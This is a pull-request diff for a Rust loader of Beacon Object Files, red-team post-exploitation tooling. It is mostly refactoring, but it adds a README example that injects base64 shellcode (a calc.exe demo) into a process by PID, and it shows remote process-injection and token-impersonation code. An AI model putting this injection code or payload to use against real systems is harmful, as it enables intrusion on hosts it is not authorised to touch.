### PR TITLE
0.2.0: Add 'bin' arg type, overhaul error handling, bump dependencies, various refactorings

### DIFF
--- a/.gitignore
+++ b/.gitignore
@@ -12,3 +12,6 @@ Cargo.lock
 
 # MSVC Windows builds of rustc generate these, which store debugging information
 *.pdb
+
+# VS Code configuration files
+.vscode/

--- a/Cargo.toml
+++ b/Cargo.toml
@@ -15,38 +15,40 @@ edition = "2021"
 # Optimize for size on release.
 strip = "debuginfo"
 codegen-units = 1
-opt-level = "z" 
+opt-level = "z"
 lto = true
 
 [dependencies]
-clap = { version = "4.3.5", features = ["derive"] }     # For command line parsing.
-tracing-subscriber = "0.3.17"                           # For logging.
-color-eyre = "0.6.2"                                    # For error handling.
-goblin = { version = "0.7.1", features = ["alloc"] }    # For parsing COFF files. object can be used too.
-widestring = "1.0.2"                                    # For wide string support.
-tracing = "0.1.37"                                      # For logging.                                    
-printf-compat = "0.1.1"                                 # For printf formatting.
-byteorder = "1.4.3"                                     # For endianess conversion.
+clap = { version = "4.3.5", features = ["derive"] } # For command line parsing.
+tracing-subscriber = "0.3.17" # For logging.
+color-eyre = "0.6.2" # For error handling.
+goblin = { version = "0.8.2", features = [
+    "alloc",
+] } # For parsing COFF files. object can be used too.
+widestring = "1.0.2" # For wide string support.
+tracing = "0.1.37" # For logging.                                    
+printf-compat = "0.1.1" # For printf formatting.
+byteorder = "1.4.3" # For endianess conversion.
 
 # Windows APIs.
-windows = { version = "0.48.0", features = [
+windows = { version = "0.56.0", features = [
     "Win32_Foundation",
     "Win32_System_Memory",
     "Win32_System_SystemServices",
     "Win32_System_LibraryLoader",
     "Win32_System_Threading",
     "Win32_Security",
-    "Win32_System_Diagnostics_Debug"
+    "Win32_System_Diagnostics_Debug",
 ] }
 
 # Pure type definitions for Windows APIs.
-windows-sys = { version = "0.48.0", features = [
+windows-sys = { version = "0.52.0", features = [
     "Win32_Foundation",
     "Win32_System_Memory",
     "Win32_System_SystemServices",
     "Win32_System_LibraryLoader",
     "Win32_System_Threading",
     "Win32_Security",
-    "Win32_System_Diagnostics_Debug"
+    "Win32_System_Diagnostics_Debug",
 ] }
 base64 = "0.22.1"

--- a/Cargo.toml
+++ b/Cargo.toml
@@ -49,3 +49,4 @@ windows-sys = { version = "0.48.0", features = [
     "Win32_Security",
     "Win32_System_Diagnostics_Debug"
 ] }
+base64 = "0.22.1"

--- a/Cargo.toml
+++ b/Cargo.toml
@@ -1,6 +1,6 @@
 [package]
 name = "coffee-ldr"
-version = "0.1.3"
+version = "0.2.0"
 authors = ["biscoito <biscoito@riseup.net>"]
 description = "Coffee: A COFF loader made in Rust"
 documentation = "https://docs.rs/coffee-ldr/latest"
@@ -19,16 +19,17 @@ opt-level = "z"
 lto = true
 
 [dependencies]
+base64 = "0.22.1" # For base64 decoding binary arguments.
+byteorder = "1.4.3" # For endianess conversion.
 clap = { version = "4.3.5", features = ["derive"] } # For command line parsing.
-tracing-subscriber = "0.3.17" # For logging.
 color-eyre = "0.6.2" # For error handling.
 goblin = { version = "0.8.2", features = [
     "alloc",
 ] } # For parsing COFF files. object can be used too.
-widestring = "1.0.2" # For wide string support.
-tracing = "0.1.37" # For logging.                                    
 printf-compat = "0.1.1" # For printf formatting.
-byteorder = "1.4.3" # For endianess conversion.
+tracing = "0.1.37" # For logging.                                    
+tracing-subscriber = "0.3.17" # For logging.
+widestring = "1.0.2" # For wide string support.
 
 # Windows APIs.
 windows = { version = "0.56.0", features = [
@@ -51,4 +52,3 @@ windows-sys = { version = "0.52.0", features = [
     "Win32_Security",
     "Win32_System_Diagnostics_Debug",
 ] }
-base64 = "0.22.1"

--- a/README.md
+++ b/README.md
@@ -13,7 +13,7 @@ Coffee: A COFF loader made in Rust
 Usage: coffee.exe [OPTIONS] --bof-path <BOF_PATH> [-- <ARGS>...]
 
 Arguments:
-  [ARGS]...  Arguments to the BOF passed after the "--" delimiter, supported types are: str, wstr, int, short
+  [ARGS]...  Arguments to the BOF passed after the "--" delimiter, supported types are: str, wstr, int, short, bin
 
 Options:
   -b, --bof-path <BOF_PATH>      Path to the Beacon Object File (BOF)
@@ -31,13 +31,20 @@ Arguments for the BOF can be passed after the `--` delimiter. Each argument must
 - `wstr` - A wide null-terminated string
 - `int` - A signed 32-bit integer
 - `short` - A signed 16-bit integer
+- `bin` - A base64-encoded binary blob
 
-## Example
+## Examples
 
 Using the `dir.x64.o` BOF from the [trustedsec/CS-Situational-Awareness-BOF](https://github.com/trustedsec/CS-Situational-Awareness-BOF) repository and passing arguments to the BOF:
 
 ```bash
 coffee.exe --bof-path .\dir.x64.o -- wstr:"C:\\Windows\\System32"
+```
+
+Using the `ntcreatethread.x64.o` BOF from the [trustedsec/CS-Remote-OPs-BOF](https://github.com/trustedsec/CS-Remote-OPs-BOF) repository and passing a PID and the shellcode to execute as base64-encoded binary data.
+
+```bash
+coffee.exe --bof-path .\ntcreatethread.x64.o -- int:1337 bin:/EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV////11IugEAAAAAAAAASI2NAQEAAEG6MYtvh//Vu+AdKgpBuqaVvZ3/1UiDxCg8BnwKgPvgdQW7RxNyb2oAWUGJ2v/VY2FsYy5leGUA
 ```
 
 ## Usage as library

--- a/src/lib.rs
+++ b/src/lib.rs
@@ -1,3 +1,4 @@
+#![allow(internal_features)]
 #![feature(c_variadic)]
 #![feature(core_intrinsics)]
 

--- a/src/loader/beacon_api.rs
+++ b/src/loader/beacon_api.rs
@@ -91,54 +91,49 @@ pub static INTERNAL_FUNCTION_NAMES: [&str; 29] = [
 ];
 
 /// Match the function name to the internal function pointer.
-///
-/// # Panics
-/// Will panic if the given function name is not found in the internal function list.
-pub fn get_function_ptr(name: &str) -> usize {
+pub fn get_function_ptr(name: &str) -> Result<usize, Box<dyn std::error::Error>> {
     match name {
         // Data
-        "BeaconDataParse" => beacon_data_parse as usize,
-        "BeaconDataPtr" => beacon_data_ptr as usize,
-        "BeaconDataInt" => beacon_data_int as usize,
-        "BeaconDataShort" => beacon_data_short as usize,
-        "BeaconDataLength" => beacon_data_length as usize,
-        "BeaconDataExtract" => beacon_data_extract as usize,
+        "BeaconDataParse" => Ok(beacon_data_parse as usize),
+        "BeaconDataPtr" => Ok(beacon_data_ptr as usize),
+        "BeaconDataInt" => Ok(beacon_data_int as usize),
+        "BeaconDataShort" => Ok(beacon_data_short as usize),
+        "BeaconDataLength" => Ok(beacon_data_length as usize),
+        "BeaconDataExtract" => Ok(beacon_data_extract as usize),
 
         // Format
-        "BeaconFormatAlloc" => beacon_format_alloc as usize,
-        "BeaconFormatReset" => beacon_format_reset as usize,
-        "BeaconFormatAppend" => beacon_format_append as usize,
-        "BeaconFormatPrintf" => beacon_format_printf as usize,
-        "BeaconFormatToString" => beacon_format_to_string as usize,
-        "BeaconFormatFree" => beacon_format_free as usize,
-        "BeaconFormatInt" => beacon_format_int as usize,
+        "BeaconFormatAlloc" => Ok(beacon_format_alloc as usize),
+        "BeaconFormatReset" => Ok(beacon_format_reset as usize),
+        "BeaconFormatAppend" => Ok(beacon_format_append as usize),
+        "BeaconFormatPrintf" => Ok(beacon_format_printf as usize),
+        "BeaconFormatToString" => Ok(beacon_format_to_string as usize),
+        "BeaconFormatFree" => Ok(beacon_format_free as usize),
+        "BeaconFormatInt" => Ok(beacon_format_int as usize),
 
         // Output
-        "BeaconOutput" => beacon_output as usize,
-        "BeaconPrintf" => beacon_printf as usize,
+        "BeaconOutput" => Ok(beacon_output as usize),
+        "BeaconPrintf" => Ok(beacon_printf as usize),
 
         // Token
-        "BeaconUseToken" => beacon_use_token as usize,
-        "BeaconRevertToken" => beacon_revert_token as usize,
-        "BeaconIsAdmin" => beacon_is_admin as usize,
+        "BeaconUseToken" => Ok(beacon_use_token as usize),
+        "BeaconRevertToken" => Ok(beacon_revert_token as usize),
+        "BeaconIsAdmin" => Ok(beacon_is_admin as usize),
 
         // Spawn / Inject functions
-        "BeaconGetSpawnTo" => beacon_get_spawn_to as usize,
-        "BeaconInjectProcess" => beacon_inject_process as usize,
-        "BeaconInjectTemporaryProcess" => beacon_inject_temporary_process as usize,
-        "BeaconSpawnTemporaryProcess" => beacon_spawn_temporary_process as usize,
-        "BeaconCleanupProcess" => beacon_cleanup_process as usize,
+        "BeaconGetSpawnTo" => Ok(beacon_get_spawn_to as usize),
+        "BeaconInjectProcess" => Ok(beacon_inject_process as usize),
+        "BeaconInjectTemporaryProcess" => Ok(beacon_inject_temporary_process as usize),
+        "BeaconSpawnTemporaryProcess" => Ok(beacon_spawn_temporary_process as usize),
+        "BeaconCleanupProcess" => Ok(beacon_cleanup_process as usize),
 
         // Utility functions
-        "toWideChar" => to_wide_char as usize,
-        "LoadLibraryA" => LoadLibraryA as usize,
-        "GetProcAddress" => GetProcAddress as usize,
-        "FreeLibrary" => FreeLibrary as usize,
-        "GetModuleHandleA" => GetModuleHandleA as usize,
-        "__C_specific_handler" => 0,
-        _ => {
-            panic!("Unknown internal function: {name}");
-        }
+        "toWideChar" => Ok(to_wide_char as usize),
+        "LoadLibraryA" => Ok(LoadLibraryA as usize),
+        "GetProcAddress" => Ok(GetProcAddress as usize),
+        "FreeLibrary" => Ok(FreeLibrary as usize),
+        "GetModuleHandleA" => Ok(GetModuleHandleA as usize),
+        "__C_specific_handler" => Ok(0),
+        _ => Err(format!("Unknown internal function: {name}").into()),
     }
 }
 

--- a/src/loader/beacon_api.rs
+++ b/src/loader/beacon_api.rs
@@ -90,50 +90,53 @@ pub static INTERNAL_FUNCTION_NAMES: [&str; 29] = [
 ];
 
 /// Match the function name to the internal function pointer.
-pub fn get_function_ptr(name: &str) -> Option<usize> {
+///
+/// # Panics
+/// Will panic if the given function name is not found in the internal function list.
+pub fn get_function_ptr(name: &str) -> usize {
     match name {
         // Data
-        "BeaconDataParse" => Some(beacon_data_parse as usize),
-        "BeaconDataPtr" => Some(beacon_data_ptr as usize),
-        "BeaconDataInt" => Some(beacon_data_int as usize),
-        "BeaconDataShort" => Some(beacon_data_short as usize),
-        "BeaconDataLength" => Some(beacon_data_length as usize),
-        "BeaconDataExtract" => Some(beacon_data_extract as usize),
+        "BeaconDataParse" => beacon_data_parse as usize,
+        "BeaconDataPtr" => beacon_data_ptr as usize,
+        "BeaconDataInt" => beacon_data_int as usize,
+        "BeaconDataShort" => beacon_data_short as usize,
+        "BeaconDataLength" => beacon_data_length as usize,
+        "BeaconDataExtract" => beacon_data_extract as usize,
 
         // Format
-        "BeaconFormatAlloc" => Some(beacon_format_alloc as usize),
-        "BeaconFormatReset" => Some(beacon_format_reset as usize),
-        "BeaconFormatAppend" => Some(beacon_format_append as usize),
-        "BeaconFormatPrintf" => Some(beacon_format_printf as usize),
-        "BeaconFormatToString" => Some(beacon_format_to_string as usize),
-        "BeaconFormatFree" => Some(beacon_format_free as usize),
-        "BeaconFormatInt" => Some(beacon_format_int as usize),
+        "BeaconFormatAlloc" => beacon_format_alloc as usize,
+        "BeaconFormatReset" => beacon_format_reset as usize,
+        "BeaconFormatAppend" => beacon_format_append as usize,
+        "BeaconFormatPrintf" => beacon_format_printf as usize,
+        "BeaconFormatToString" => beacon_format_to_string as usize,
+        "BeaconFormatFree" => beacon_format_free as usize,
+        "BeaconFormatInt" => beacon_format_int as usize,
 
         // Output
-        "BeaconOutput" => Some(beacon_output as usize),
-        "BeaconPrintf" => Some(beacon_printf as usize),
+        "BeaconOutput" => beacon_output as usize,
+        "BeaconPrintf" => beacon_printf as usize,
 
         // Token
-        "BeaconUseToken" => Some(beacon_use_token as usize),
-        "BeaconRevertToken" => Some(beacon_revert_token as usize),
-        "BeaconIsAdmin" => Some(beacon_is_admin as usize),
+        "BeaconUseToken" => beacon_use_token as usize,
+        "BeaconRevertToken" => beacon_revert_token as usize,
+        "BeaconIsAdmin" => beacon_is_admin as usize,
 
         // Spawn / Inject functions
-        "BeaconGetSpawnTo" => Some(beacon_get_spawn_to as usize),
-        "BeaconInjectProcess" => Some(beacon_inject_process as usize),
-        "BeaconInjectTemporaryProcess" => Some(beacon_inject_temporary_process as usize),
-        "BeaconSpawnTemporaryProcess" => Some(beacon_spawn_temporary_process as usize),
-        "BeaconCleanupProcess" => Some(beacon_cleanup_process as usize),
+        "BeaconGetSpawnTo" => beacon_get_spawn_to as usize,
+        "BeaconInjectProcess" => beacon_inject_process as usize,
+        "BeaconInjectTemporaryProcess" => beacon_inject_temporary_process as usize,
+        "BeaconSpawnTemporaryProcess" => beacon_spawn_temporary_process as usize,
+        "BeaconCleanupProcess" => beacon_cleanup_process as usize,
 
         // Utility functions
-        "toWideChar" => Some(to_wide_char as usize),
-        "LoadLibraryA" => Some(LoadLibraryA as usize),
-        "GetProcAddress" => Some(GetProcAddress as usize),
-        "FreeLibrary" => Some(FreeLibrary as usize),
-        "GetModuleHandleA" => Some(GetModuleHandleA as usize),
-        "__C_specific_handler" => Some(0),
+        "toWideChar" => to_wide_char as usize,
+        "LoadLibraryA" => LoadLibraryA as usize,
+        "GetProcAddress" => GetProcAddress as usize,
+        "FreeLibrary" => FreeLibrary as usize,
+        "GetModuleHandleA" => GetModuleHandleA as usize,
+        "__C_specific_handler" => 0,
         _ => {
-            panic!("Unknown internal function: {}", name);
+            panic!("Unknown internal function: {name}");
         }
     }
 }
@@ -153,24 +156,30 @@ impl Carrier {
         }
     }
 
-    pub fn append_char_array(&mut self, s: *mut c_char, len: c_int) {
+    /// Append a char array to the output buffer.
+    ///
+    /// # Safety
+    /// This function is unsafe because it dereferences the given pointer.
+    /// The caller must ensure that the pointer is valid and points to a valid memory location.
+    pub unsafe fn append_char_array(&mut self, s: *mut c_char, len: c_int) {
         let holder = unsafe { slice::from_raw_parts(s, len as usize) };
 
         self.output.extend_from_slice(holder);
         self.offset = self.output.len() - holder.len();
     }
 
-    pub fn append_string(&mut self, s: String) {
+    #[allow(clippy::cast_possible_wrap)]
+    pub fn append_string(&mut self, s: &str) {
         let mut mapped = s.bytes().map(|c| c as i8).collect::<Vec<c_char>>();
 
         self.output.append(&mut mapped);
-        self.offset = self.output.len() - s.len() as usize;
+        self.offset = self.output.len() - s.len();
     }
 
     pub fn flush(&mut self) -> String {
         let mut result = String::new();
 
-        for c in self.output.iter() {
+        for c in &self.output {
             if (*c as u8) == 0 {
                 result.push(0x0a as char);
             } else {
@@ -181,13 +190,20 @@ impl Carrier {
         result
     }
 
+    #[allow(clippy::len_without_is_empty)]
     pub fn len(&self) -> usize {
-        return self.output.len();
+        self.output.len()
     }
 
     pub fn reset(&mut self) {
         self.output.clear();
         self.offset = 0;
+    }
+}
+
+impl Default for Carrier {
+    fn default() -> Self {
+        Self::new()
     }
 }
 
@@ -214,8 +230,6 @@ extern "C" fn beacon_data_parse(parser: *mut Datap, buffer: *mut c_char, size: c
     unsafe {
         *parser = data_parser;
     }
-
-    return;
 }
 
 #[no_mangle]
@@ -243,13 +257,13 @@ extern "C" fn beacon_data_int(parser: *mut Datap) -> c_int {
     dst.clone_from_slice(&result[0..4]);
 
     data_parser.buffer = unsafe { data_parser.buffer.add(4) };
-    data_parser.length = data_parser.length - 4;
+    data_parser.length -= 4;
 
     unsafe {
         *parser = data_parser;
     }
 
-    return i32::from_ne_bytes(dst) as c_int;
+    i32::from_ne_bytes(dst) as c_int
 }
 
 /// Extract a 2b integer.
@@ -271,13 +285,13 @@ extern "C" fn beacon_data_short(parser: *mut Datap) -> c_short {
     dst.clone_from_slice(&result[0..2]);
 
     data_parser.buffer = unsafe { data_parser.buffer.add(2) };
-    data_parser.length = data_parser.length - 2;
+    data_parser.length -= 2;
 
     unsafe {
         *parser = data_parser;
     }
 
-    return i16::from_ne_bytes(dst);
+    i16::from_ne_bytes(dst)
 }
 
 /// Get the amount of data left to parse.
@@ -289,11 +303,12 @@ extern "C" fn beacon_data_length(parser: *mut Datap) -> c_int {
 
     let data_parser: Datap = unsafe { *parser };
 
-    return data_parser.length;
+    data_parser.length
 }
 
 /// Extract a length-prefixed binary blob. The size argument may be NULL. If an address is provided, size is populated with the number-of-bytes extracted.
 #[no_mangle]
+#[allow(clippy::cast_possible_wrap)]
 extern "C" fn beacon_data_extract(parser: *mut Datap, size: *mut c_int) -> *mut c_char {
     if parser.is_null() {
         return ptr::null_mut();
@@ -320,8 +335,8 @@ extern "C" fn beacon_data_extract(parser: *mut Datap, size: *mut c_int) -> *mut 
         return ptr::null_mut();
     }
 
-    data_parser.length = data_parser.length - 4;
-    data_parser.length = data_parser.length - length as i32;
+    data_parser.length -= 4;
+    data_parser.length -= length as i32;
     data_parser.buffer = unsafe { data_parser.buffer.add(length as usize) };
 
     if !size.is_null() && !result.is_null() {
@@ -334,7 +349,7 @@ extern "C" fn beacon_data_extract(parser: *mut Datap, size: *mut c_int) -> *mut 
         *parser = data_parser;
     }
 
-    return result;
+    result
 }
 
 /// Allocate memory to format complex or large output.
@@ -353,13 +368,13 @@ extern "C" fn beacon_format_alloc(format: *mut Formatp, maxsz: c_int) {
     let mut align: usize = 1;
 
     while align < maxsz as usize {
-        align = align * 2;
+        align *= 2;
     }
 
     let layout = Layout::from_size_align(maxsz as usize, align).unwrap();
     let ptr = unsafe { std::alloc::alloc(layout) };
 
-    format_parser.original = ptr as *mut i8;
+    format_parser.original = ptr.cast::<i8>();
     format_parser.buffer = format_parser.original;
     format_parser.length = 0;
     format_parser.size = maxsz;
@@ -367,8 +382,6 @@ extern "C" fn beacon_format_alloc(format: *mut Formatp, maxsz: c_int) {
     unsafe {
         *format = format_parser;
     }
-
-    return;
 }
 
 /// Resets the format object to its default state (prior to re-use).
@@ -391,8 +404,6 @@ extern "C" fn beacon_format_reset(format: *mut Formatp) {
     unsafe {
         *format = format_parser;
     }
-
-    return;
 }
 
 /// Append data to this format object.
@@ -413,17 +424,16 @@ extern "C" fn beacon_format_append(format: *mut Formatp, text: *const c_char, le
     }
 
     format_parser.buffer = unsafe { format_parser.buffer.add(len as usize) };
-    format_parser.length = format_parser.length + len;
+    format_parser.length += len;
 
     unsafe {
         *format = format_parser;
     }
-
-    return;
 }
 
 /// Append a formatted string to this object.
 #[no_mangle]
+#[allow(clippy::cast_possible_wrap)]
 unsafe extern "C" fn beacon_format_printf(format: *mut Formatp, fmt: *const c_char, mut args: ...) {
     if format.is_null() {
         return;
@@ -444,16 +454,15 @@ unsafe extern "C" fn beacon_format_printf(format: *mut Formatp, fmt: *const c_ch
 
     s.push('\0');
 
-    intrinsics::copy_nonoverlapping(s.as_ptr(), format_parser.buffer as *mut u8, s.len());
+    intrinsics::copy_nonoverlapping(s.as_ptr(), format_parser.buffer.cast::<u8>(), s.len());
 
-    format_parser.length = format_parser.length + s.len() as i32;
+    format_parser.length += s.len() as i32;
 
     *format = format_parser;
-
-    return;
 }
 
-/// Extract formatted data into a single string. Populate the passed in size variable with the length of this string. These parameters are suitable for use with the BeaconOutput function.
+/// Extract formatted data into a single string. Populate the passed in size variable with the length of this string.
+/// These parameters are suitable for use with the `BeaconOutput` function.
 #[no_mangle]
 extern "C" fn beacon_format_to_string(format: *mut Formatp, size: *mut c_int) -> *mut c_char {
     if format.is_null() {
@@ -470,7 +479,7 @@ extern "C" fn beacon_format_to_string(format: *mut Formatp, size: *mut c_int) ->
         *size = format_parser.length;
     }
 
-    return format_parser.original;
+    format_parser.original
 }
 
 /// Free the format object.
@@ -486,12 +495,12 @@ extern "C" fn beacon_format_free(format: *mut Formatp) {
         let mut align: usize = 1;
 
         while align < format_parser.size as usize {
-            align = align * 2;
+            align *= 2;
         }
 
         let layout = Layout::from_size_align(format_parser.size as usize, align).unwrap();
 
-        unsafe { std::alloc::dealloc(format_parser.original as *mut u8, layout) };
+        unsafe { std::alloc::dealloc(format_parser.original.cast::<u8>(), layout) };
     }
 
     format_parser.original = ptr::null_mut();
@@ -502,8 +511,6 @@ extern "C" fn beacon_format_free(format: *mut Formatp) {
     unsafe {
         *format = format_parser;
     }
-
-    return;
 }
 
 /// Append a 4b integer (big endian) to this object.
@@ -523,17 +530,19 @@ extern "C" fn beacon_format_int(format: *mut Formatp, value: c_int) {
     let mut result = swapped.to_be_bytes();
 
     unsafe {
-        intrinsics::copy_nonoverlapping(result.as_mut_ptr(), format_parser.original as *mut u8, 4);
+        intrinsics::copy_nonoverlapping(
+            result.as_mut_ptr(),
+            format_parser.original.cast::<u8>(),
+            4,
+        );
     }
 
     format_parser.buffer = unsafe { format_parser.buffer.add(4) };
-    format_parser.length = format_parser.length + 4;
+    format_parser.length += 4;
 
     unsafe {
         *format = format_parser;
     }
-
-    return;
 }
 
 /// Send output to the Beacon operator.
@@ -544,8 +553,9 @@ extern "C" fn beacon_output(_type: c_int, data: *mut c_char, len: c_int) {
 
 /// Retrieves the output data from the beacon.
 #[no_mangle]
-pub fn beacon_get_output_data() -> &'static mut Carrier {
-    return unsafe { &mut OUTPUT };
+#[allow(static_mut_refs)]
+pub extern "C" fn beacon_get_output_data() -> &'static mut Carrier {
+    unsafe { &mut OUTPUT }
 }
 
 /// Format and present output to the Beacon operator.
@@ -561,32 +571,36 @@ unsafe extern "C" fn beacon_printf(_type: c_int, fmt: *mut c_char, mut args: ...
 
     s.push('\0');
 
-    OUTPUT.append_string(s);
-
-    return;
+    OUTPUT.append_string(&s);
 }
 
-/// Apply the specified token as Beacon's current thread token. This will report the new token to the user too. Returns TRUE if successful. FALSE is not.
+/// Apply the specified token as Beacon's current thread token.
+/// This will report the new token to the user too.
+///
+/// # Returns
+/// Returns TRUE if the token was successfully applied, FALSE otherwise.
 #[no_mangle]
 extern "C" fn beacon_use_token(token: HANDLE) -> BOOL {
     unsafe { SetThreadToken(Some(std::ptr::null()), token) }
 }
 
-/// Drop the current thread token. Use this over direct calls to RevertToSelf. This function cleans up other state information about the token.
+/// Drop the current thread token. Use this over direct calls to `RevertToSelf`.
+/// This function cleans up other state information about the token.
 #[no_mangle]
 extern "C" fn beacon_revert_token() {
     if !unsafe { RevertToSelf() }.as_bool() {
         warn!("RevertToSelf Failed!");
     }
-
-    return;
 }
 
+/// Check if the current Beacon is running in an elevated context.
+///
+/// # Returns
 /// Returns TRUE if Beacon is in a high-integrity context.
 #[no_mangle]
 extern "C" fn beacon_is_admin() -> BOOL {
     let mut token: HANDLE = HANDLE(0);
-    let mut token_elevated: TOKEN_ELEVATION = TOKEN_ELEVATION { TokenIsElevated: 0 };
+    let token_elevated: TOKEN_ELEVATION = TOKEN_ELEVATION { TokenIsElevated: 0 };
 
     unsafe {
         if !OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &mut token).as_bool() {
@@ -598,7 +612,7 @@ extern "C" fn beacon_is_admin() -> BOOL {
         if !GetTokenInformation(
             token,
             TokenElevation,
-            Some(&mut token_elevated as *const _ as *mut _),
+            Some(std::ptr::from_ref(&token_elevated) as *mut _),
             std::mem::size_of::<TOKEN_ELEVATION>() as u32,
             std::ptr::null_mut(),
         )
@@ -612,7 +626,7 @@ extern "C" fn beacon_is_admin() -> BOOL {
         return TRUE;
     }
 
-    return FALSE;
+    FALSE
 }
 
 /// Populate the specified buffer with the x86 or x64 spawnto value configured for this Beacon session.
@@ -621,7 +635,9 @@ extern "C" fn beacon_get_spawn_to(_x86: BOOL, _buffer: *const c_char, _length: c
     unimplemented!();
 }
 
-/// This function will inject the specified payload into an existing process. Use payload_offset to specify the offset within the payload to begin execution. The arg value is for arguments. arg may be NULL.
+/// This function will inject the specified payload into an existing process.
+/// Use `payload_offset` to specify the offset within the payload to begin execution.
+/// The arg value is for arguments. arg may be NULL.
 #[no_mangle]
 extern "C" fn beacon_inject_process(
     _hproc: HANDLE,
@@ -639,8 +655,8 @@ extern "C" fn beacon_inject_process(
             return;
         }
 
-        let payload_slice = std::slice::from_raw_parts(payload as *const u8, p_len as usize);
-        let _arg_slice = std::slice::from_raw_parts(arg as *const u8, a_len as usize);
+        let payload_slice = std::slice::from_raw_parts(payload.cast::<u8>(), p_len as usize);
+        let _arg_slice = std::slice::from_raw_parts(arg.cast::<u8>(), a_len as usize);
 
         let remote_payload_address = VirtualAllocEx(
             process_handle,
@@ -658,7 +674,7 @@ extern "C" fn beacon_inject_process(
         if !WriteProcessMemory(
             process_handle,
             remote_payload_address,
-            payload_slice.as_ptr() as *const _,
+            payload_slice.as_ptr().cast(),
             payload_slice.len(),
             None,
         )
@@ -672,7 +688,10 @@ extern "C" fn beacon_inject_process(
             process_handle,
             None,
             0,
-            Some(std::mem::transmute(remote_payload_address)),
+            Some(std::mem::transmute::<
+                *mut std::ffi::c_void,
+                unsafe extern "system" fn(*mut std::ffi::c_void) -> u32,
+            >(remote_payload_address)),
             None,
             0,
             None,
@@ -684,7 +703,11 @@ extern "C" fn beacon_inject_process(
     }
 }
 
-/// This function will inject the specified payload into a temporary process that your BOF opted to launch. Use payload_offset to specify the offset within the payload to begin execution. The arg value is for arguments. arg may be NULL.
+/// This function will inject the specified payload into a temporary process that your BOF opted to launch.
+/// Use `payload_offset` to specify the offset within the payload to begin execution.
+///
+/// # Arguments
+/// The `arg` value is for arguments, which may be NULL.
 #[no_mangle]
 extern "C" fn beacon_inject_temporary_process(
     _pinfo: *const PROCESS_INFORMATION,
@@ -698,7 +721,8 @@ extern "C" fn beacon_inject_temporary_process(
     unimplemented!();
 }
 
-/// This function spawns a temporary process accounting for ppid, spawnto, and blockdlls options. Grab the handle from PROCESS_INFORMATION to inject into or manipulate this process. Returns TRUE if successful.
+/// This function spawns a temporary process accounting for ppid, spawnto, and blockdlls options.
+/// Grab the handle from `PROCESS_INFORMATION` to inject into or manipulate this process.
 #[no_mangle]
 extern "C" fn beacon_spawn_temporary_process(
     _x86: BOOL,
@@ -716,8 +740,6 @@ extern "C" fn beacon_cleanup_process(pinfo: *const PROCESS_INFORMATION) {
         CloseHandle((*pinfo).hProcess);
         CloseHandle((*pinfo).hThread);
     }
-
-    return;
 }
 
 /// Convert the src string to a UTF16-LE wide-character string, using the target's default encoding. max is the size (in bytes!) of the destination buffer.
@@ -740,26 +762,22 @@ extern "C" fn to_wide_char(src: *const c_char, dst: *mut c_short, max: c_int) ->
         size = max as usize - 1;
     }
 
-    let mut v: Vec<u16> = str_slice
-        .encode_utf16()
-        .take(size)
-        .map(|x| x as u16)
-        .collect();
+    let mut v: Vec<u16> = str_slice.encode_utf16().take(size).collect();
     v.push(0);
 
-    unsafe { ptr::copy(v.as_ptr(), dst as *mut u16, size) };
+    unsafe { ptr::copy(v.as_ptr(), dst.cast::<u16>(), size) };
 
     TRUE
 }
 
 #[no_mangle]
 pub extern "C" fn swap_endianness(src: u32) -> u32 {
-    let test: u32 = 0x000000ff;
+    let test: u32 = 0x0000_00ff;
 
     // if test is 0xff00, then we are little endian, otherwise big endian
     if (((test >> 24) & 0xff) as u8) == 0xff {
         return src.swap_bytes();
     }
 
-    return src;
+    src
 }

--- a/src/loader/beacon_pack.rs
+++ b/src/loader/beacon_pack.rs
@@ -76,6 +76,18 @@ impl BeaconPack {
         self.buffer.write_u16::<LittleEndian>(0).unwrap();
         self.size += ((s_bytes.len() * 2) + 2) as u32 + 4;
     }
+
+    /// `add_bin` adds binary data to the buffer
+    ///
+    /// # Panics
+    /// Panics if the buffer cannot be written as binary data
+    pub fn add_bin(&mut self, bin: &[u8]) {
+        self.buffer
+            .write_u32::<LittleEndian>(bin.len() as u32)
+            .unwrap();
+        self.buffer.write_all(bin).unwrap();
+        self.size += (bin.len() as u32) + 4;
+    }
 }
 
 impl Default for BeaconPack {

--- a/src/loader/beacon_pack.rs
+++ b/src/loader/beacon_pack.rs
@@ -1,6 +1,7 @@
 // BeaconPack rust port from https://github.com/trustedsec/COFFLoader/blob/main/beacon_generate.py
 use byteorder::{LittleEndian, WriteBytesExt};
 use std::io::Write;
+use std::result::Result;
 
 pub struct BeaconPack {
     pub buffer: Vec<u8>,
@@ -19,74 +20,57 @@ impl BeaconPack {
     }
 
     /// `get_buffer` returns the buffer with the size prepended
-    ///
-    /// # Panics
-    /// Panics if the buffer cannot be written as an u32
-    pub fn get_buffer(&self) -> Vec<u8> {
+    pub fn get_buffer(&self) -> Result<Vec<u8>, Box<dyn std::error::Error>> {
         let mut result = vec![];
-        result.write_u32::<LittleEndian>(self.size).unwrap();
+        result.write_u32::<LittleEndian>(self.size)?;
         result.extend(&self.buffer);
-        result
+        Ok(result)
     }
 
     /// `add_short` adds a short to the buffer
-    ///
-    /// # Panics
-    /// Panics if the buffer cannot be written as a i16
-    pub fn add_short(&mut self, short: i16) {
-        self.buffer.write_i16::<LittleEndian>(short).unwrap();
+    pub fn add_short(&mut self, short: i16) -> Result<(), Box<dyn std::error::Error>> {
+        self.buffer.write_i16::<LittleEndian>(short)?;
         self.size += 2;
+        Ok(())
     }
 
     /// `add_int` adds an int to the buffer
-    ///
-    /// # Panics
-    /// Panics if the buffer cannot be written as a i32
-    pub fn add_int(&mut self, int: i32) {
-        self.buffer.write_i32::<LittleEndian>(int).unwrap();
+    pub fn add_int(&mut self, int: i32) -> Result<(), Box<dyn std::error::Error>> {
+        self.buffer.write_i32::<LittleEndian>(int)?;
         self.size += 4;
+        Ok(())
     }
 
     /// `add_str` adds a string to the buffer
-    ///
-    /// # Panics
-    /// Panics if the buffer cannot be written as a string
-    pub fn add_str(&mut self, str: &str) {
+    pub fn add_str(&mut self, str: &str) -> Result<(), Box<dyn std::error::Error>> {
         let s_bytes = str.as_bytes();
